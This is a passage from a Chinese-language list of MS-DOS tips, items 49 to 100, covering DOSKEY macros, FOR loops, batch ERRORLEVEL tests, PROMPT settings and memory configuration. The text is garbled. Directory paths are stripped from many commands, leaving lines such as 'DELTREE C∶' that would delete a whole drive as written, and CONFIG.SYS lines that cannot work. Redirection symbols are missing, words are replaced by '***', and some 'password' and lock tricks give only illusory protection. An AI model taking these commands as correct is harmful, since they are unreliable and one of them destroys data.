对MD命令进行重新定义,此后使用MD时,建立目录和进入目录同步完成。
49.排除法文件列表
DIR命令中支持通配符*和?来代替其它字符,但却没有提供相应的排除字符的功能,而利用FIND命令中的/V参数,则能方便地实
现排除法列表。下述命令能将除去.BAK文件和子目录以外的所有文件列出∶
DIR|FIND/V"BAK"|FIND/V"DIR"
50.和的区别
DIRDIRLIST∶如果DIRLIST文件存在,将清除其文件内容,并将新内容输入文件中。
DIRDIRLIST∶如果DIRLIST文件存在,将输出数据附加到这个文件末尾。
在DIRLIST文件不存在时,两者是等价的。
51.快速添加搜索路径
PATH=%PATH%;%1
52.对数据文件及由字处理程序生成的文本文件等不可执行文件,建立自动搜索路径。
APPEND命令能将一组指定的目录添加进当前目录的逻辑扩展,从而不用指定路径就能打开这组文件。APPEND后可以放多个目录,
只要用";"隔开即可,例如∶
APPEND C∶;C∶;C∶;C∶;
53.将目录名隐藏起来
由于ATTRIB命令可改变一个目录的属性,所以利用该命令可将目录名隐藏起来。例如,将目录C∶隐藏起来∶
ATTRIB +H C∶
54.快速删除目录树
用DELTREE命令可快速地删除指定目录,而不管目录中有多少子目录和目录及文件为何种属性。例如∶DELTREE C∶
55.防止误删除文件
DEL命令是一个危险的命令,可以用下述命令对其进行重新定义,使得在删除文件时有确认提示∶
DOSKEY DEL=DEL $1/P
56.如果误删除了某些文件,有什么办法及时地将它们恢复?
UNDELETE命令可以用来恢复删除文件,以下命令能将当前目录中的被删文件恢复出来∶
UNDELETE *.*/ALL
此命令恢复出来的文件名的之一个字符变成了#,可用REN命令更改成原来的文件名。
57.删除多个文件名无共同特征的文件时,由于难用通配符,只能逐个删除,比较麻烦。有没有其他方便的 *** ?
有。使用DEL *.*/P命令,系统会逐个列出指定目录的所有文件,询问用户是否删除,对欲删除文件回答Y,否则回答N。
58.加密文件名一法
在要加密的文件名最后加上ASCII字符255。 *** 是输入文件名后按下ALT键,然后输入255。这样,用DIR命令列出该文件时,并
不显示这个字符,即从文件名看不出发生了任何变化,起到了一定的加密作用。
59.回忆用过的命令
执行DOSKEY命令后,用户所输入的命令便被存储起来,以后若要回忆使用过的命令,可随时用"↑"或"↓"键进行前后逐条查找。
60.禁止非法访问某个驱动器
在AUTOEXEC.BAT文件中加入下述两条命令,可以禁止非法访问D盘,当输入D∶时,屏幕即关闭,只有知道密码ZM的人才能进入D
盘∶
DOSKEY D∶=ECHO OFF
DOSKEY ZM=D∶
61.防止别人误将C盘格式化
为了保护C盘,防止别人格式化,可用DOSKEY对FORMAT命令进行重新定义,例如∶
DOSDEY FORMAT=You can not format C∶!
这样,别人在使用FORMAT时将出现Yor can not format C∶!的提示,从而使C盘得到保护。若自己想用FORMAT时,再用如下命令
恢复∶
DOSKEY FORMAT=
62.检查屏幕状态,获得有关屏幕显示字符和行数的报告
MODE CON
63.设置屏幕每行显示字符数和每屏的行数
例如∶
MODE CON COLS=80 LINES=25
64.提高键盘的响应速度
MODE CON∶RATE=32 DELAY=1
65.不喜欢系统启动时Num Lock键的缺省设置怎么办?
在CONFIG SYS文件中加进NUMLOCK命令,根据你的爱好指定系统启动时NUMLOCK键的状态∶
NUMLOCK=ON(或OFF)
66.简单的键盘锁
在你使用计算机时,如果只离开一会,又不想关机,为了不让别人随意使用,可编制一个简单的键盘锁LOCK BAT程序(内容如下)
∶
@ECHO OFF
CLS
CHOICE/C:*/N
运行之后,形同死机,"*"号就是键盘锁的钥匙,不知道的人无法破译。
67.文件的选择显示
假设有MY1 TXT、MY2 TXT、…、MY10.TXT共10个文件,现欲显示其中的MY2.TXT、MY3.TXT、MY6.TXT和MY9.TXT 4个文件,可用如
下命令很方便地实现∶
FOR %A IN(2369)DO TYPE MY%A.TXT
68.删除误拷贝文件
当用COPY A∶*.*命令把A盘上所有文件拷贝到硬盘某子目录下时,却不慎误拷贝到硬盘根目录下,如误拷贝的文件数量很多,且
文件名没有任何特征,这时如要删除这些文件,通常做法是用PCTOOLS工具软件进行选择删除,比较麻烦。使用FOR命令就简单多了∶
AFOR %A IN(*.*)DO DEL C∶%A
69.由于FIND命令不能接受通配符,若希望在若干个文本文件中寻找含有某个字符串插,就只能对每个文件依次使用FIND命令,
显然很费功夫,没有捷径吗?
有。使用FOR命令与FIND命令配合,格式为∶
FOR%A IN(文件组)DO FIND"string"%A
70.FOR命令不能嵌套,有没有办法实现FOR循环嵌套呢?
有。可以把COMMAND.COM作为之一层循环里的命令,让它再执行一个FOR循环命令。例如,下述命令可以在屏幕上显示12
行"Welcome you":FOR %A IN(123)DO COMMAND/C FOR %B IN(1234)DO ECHO Welcome you
71.双冒号∶∶在注释行中的作用
在DOS批处理文件开头,经常使用REM注释命令加一个程序头。例如,假设有一个名为TEST.BAT的批处理文件,它以一个文本文件名
为输入参数,若在开头说明其用法时,使用了一个采用和和括号的注释行,即∶
REM TESTfilename
程序执行此命令时,DOS将显示"File not found"信息,因为它以为filename是一个重定向输入操作的源文件,它在当前目录中
找不到。如何解决这个问题?
很简单,只须将REM改为双冒号"∶∶",即∶
∶∶TESTfilename
72.批处理中的IF ERRORLEVEL
在批处理文件里使用IF ERRORLEVEL命令时要小心,因为DOS认为任何大于或等于设定值的出口状态值都是等效的。通常应按从大到
小的次序测试出口状态值,例如∶
IF ERRORLEVEL 2 ECHO TWO
IF ERRORLEVEL 1 ECHO ONE
IF ERRORLEVEL 0 ECHO ZERO
73.能不能按从小到大的次序测试出口状态值?
能。但应结合IF NOT的形式进行判断,例如72例中的命令应改为∶
IF ERRORLEVEL 0 IF NOT ERRORLEVEL 1 ECHO ZERO
IF ERRORLEVEL 1 IF NOT ERRORLEVEL 2 ECHO ONE
IF ERRORLEVEL 2 IF NOT ERRORLEVEL 3 ECHO TWO
74.批处理文件中使用@符禁止命令显示在屏幕上
由于DOS是在各个命令执行前就将它们显示到屏幕上的,因此,即使你将ECHO命令置为OFF,它本身也会出现在屏幕上。要抑制它
的显示,可在ECHO命令行前加@符∶@ ECHO OFF
75.统计源程序的行数
假设源程序名为ZM.PRG,下述FIND命令可方便地统计它共有多少行∶
FIND/V/C" "ZM.PRG
76.对文本文件进行排序
SORT命令常用来对一些基于文本行的文件进行排序显示。例如,按姓名的开头字母显示一个含有 *** 号码的清单文件。命令格式
∶
SORT[/R][/+n]filename1filename2
其中,/R表示反向排序,/+n表示从第几行开始排序,filename1为源文件名,filename2为排序后的文件名。
77.用PROMPT设置有意义的提示符
PROMPT命令用于设置新的DOS系统提示符。例如∶
PROMPT $P$G 取当前驱动器名及目录作为提示符
PROMPT $D$G 取当前系统日期作为提示符。
78.如何设定屏幕颜色?
假设ANSI.SYS已被安装在内存中,以下命令可把屏幕设置成白底红字∶
PROMPT $E[31;47m
79.在屏幕上选定的位置显示日期和时间信息
把ANSI SYS的屏幕和光标控制功能与PROMPT的设定DOS命令提示符功能结合起来,可以在屏幕上选定的位置显示特殊的信息。例
如,在AUTOEXEC BAT中加入下述命令行,可将日期和时间信息移到屏幕的右下方∶
PROMPT $E[S $E[25;52H $D$T $E[u $P$G
80.用F2键编辑上次命令
用F1或F3功能键可复制上次命令,类似地F2键能得到部分上次命令,当按下F2键时,DOS就将上次命令内容拷贝到按F2键后键入的
字符(不含)为止。
例如,键入了以下命令∶
CDIR.COMenter
按F2键及M键,可以得到∶
CDIR
这时再按INS插入键,输入R,再按F3键复制上次命令剩余部分,得到正确的命令∶
CDIR.COM
81、用F4键编辑上次命令
当按下F4键时,DOS从按F4键后按的字母开始复制上次命令。例如,上次命令为∶
CDIR[enter]
按下F4键,再输入F,然后再按F3,DOS就会显示FORMAT命令∶
CFORMAT
82、用SHELL命令改变环境空间的大小
将环境变量空间增加到1KB,可在CONFIG.SYS文件中加进命令行∶
SHELL=C∶.COM/P/E∶1024
83、在批处理文件中引用环境变量
批处理文件可以引用系统上已定义的环境变量。具体 *** 是在环境变量名的前后各放一个百分号"%"。例如,要在批处理文件中显
示环境变量PATH的内容,可加进命令行∶
ECHO %PATH%
84、查看单个环境变量
如果你经常使用环境变量,当用SET命令显示当前所有已分配的环境变量时,列表就可能很长,屏幕可能很杂乱。为方便起见,可
用下面的批处理文件VIEWENV.BAT在命令行直接显示单个环境变量∶
SET|FIND/I "%1"
例如,要察看COMSPEC的内容,只须执行∶
VIEWENV COMSPEC
85、 *** DOS系统盘
*** 一∶FORMAT A∶/S
*** 二∶SYS A∶
86、定期整理硬盘
具体步骤∶
?删除硬盘中不必要的文件
?运行CHKDSK/F
?运行DEFRAG
87、了解内存的类型
?常规内存∶0~640KB
?上位内存区(UMA)∶640KB~1MB
?扩展内存∶自1MB起向上延伸
?高内存区(HMA)∶1MB以上的稍小于64KB的扩展内存区
?扩充内存
88、将DOS移到高内存区
为使用户有较大的可用基本内存,可以在CONFIG.SYS文件中加入下述命令,加载HIMEM.SYS,将DOS移入高内存区(HMA)∶
DEVICE=C∶.SYS
DOS=HIGH
89、将设备驱动程序和内存驻留程序装入上位内存(UMB)
在CONFIG.SYS文件中加进命令∶
DEVICE=C∶.EXE NOEMS
DOS=UMB
90、将程序装入高内存区
将程序装入HMA的 *** 是在命令行上加一个/U开关,例如∶
MOUSE/U
91、上位内存的使用
为将程序驻留上位内存,使用LOADHIGH(或LH)程序名即或,例如∶
LH MOUSE
92、如何显示某个特定程序占用内存的情况?
MEM/M module
其中,module表示特定程序文件名,不要带扩展名。
93、使用Memmaker自动优化内存
执行MEMMAKER/BATCH命令,MEMMAKER就自动为CONFIG.SYS和AUTOEXEC.BAT文件做更优的设置,此后,执行MEM/C/P来观察内存的分
配情况,你会发现主存变大了。
94、若不满意MEMMAKER的优化设置,应该怎么办?
很简单,只须执行MEMMAKER/UNDO即可恢复你原来的配置。
95、磁盘高速缓冲存储器 *** ARTDRV的使用
为建立一个具有256K(默认值)的磁盘高速缓存,可在AUTOEXEC.BAT文件中加入命令行∶
C∶
由于 *** ARTDRV是建立在扩展内存中,所以还必须在CONFIG.SYS文件中加入命令行∶
DEVICE=C∶.SYS
96、当你关闭计算机或重新启动时,希望确定所有在高速缓存的信息均已写入硬盘时,应在系统提示符下键入命令∶
*** ARTDRV/C
97、跳过SCANDISK的磁介质扫描
运行SCANDISK时,磁介质扫描要消耗很长时间,其实,使用SCANDISK/CHECKON *** 便可跳过它。
98、LOADFIX命令的正确使用
在优化过程中,有少数程序不能在640KB常规内存的低64KB内正确运行。此时,可使用LOADFIX命令让可执行程序(如ZMPROG.EXE)在
低64KB以上的内存中运行, *** 是在要运行的应用程序前加上LOADFIX∶
LOADFIX ZMPROG
99、何时使用虚拟盘(也称RAM盘)?
RAM盘能显着提高磁盘文件的存取速度,但它在断电或重启动时会丢失数据。因此,使用RAM盘时要特别小心。在没有硬盘的系统上
,RAM盘值得一用;在需要存放较大的临时文件或复制程序时,也可以使用;当你的系统上配有CD-ROM时,在开始工作前,可将CD-
ROM盘上的文件与数据复制进RAM盘,能够显着提高效率。
100、虚拟盘的安装
DOS提供的RAMDRIVE.SYS是一个虚拟盘驱动程序,你可以将它安装进内存,让它使用扩展内存或扩充内存,生成指定大小的RAM盘。
例如,在CONFIG.SYS中加进下述命令,可在扩展内存中生成一个1MB的RAM盘∶
DEVICE=C∶.SYS 1024/E